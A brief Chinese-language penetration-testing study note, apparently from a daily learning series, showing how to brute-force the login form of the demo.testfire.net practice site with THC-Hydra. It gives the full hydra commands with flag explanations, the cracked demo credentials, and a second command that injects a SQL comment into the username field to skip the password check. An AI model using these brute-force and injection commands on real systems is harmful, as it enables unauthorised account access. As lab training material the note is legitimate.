Day29_渗透 thc-hydra

使用浏览器查找该网页原始码

先找form > 帐号栏位为uid > 密码栏位为passw > 使用post传给doLogin

破解

cd C:\Users\user\Downloads\thc-hydra-windows-v8.5

移到hydra目录下

hydra -L user.lst -P password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

-L > 指定帐号字典档
-l > 指定一个帐号
-P > 指定密码字典档
-p > 指定一个密码
http-post-form > 服务模组
/doLogin > 验证网址
： > 分隔
uid=^USER^&passw=^PASS^&btnSubmit=Login > 要传送给验证网址的资料
Login Failed > 判断准则
C=/login.jsp > 指定在传送资料前，先向网址取得Cookie资讯
login:admin password:admin > 破解的第一组帐号密码
login:jsmith password:demo1234 > 破解的第二组帐号密码

密码固定，破解帐号

hydra -L user.lst -p 1234 demo.testfire.net http-post-form "/doLogin:uid=^USER^' --&passw=1234:Login Failed:C=/login.jsp"

固定密码为1234 > 破解帐号
login:admin password:1234 > 破解的第一组帐号
login:jsmith password:1234 > 破解的第二组帐号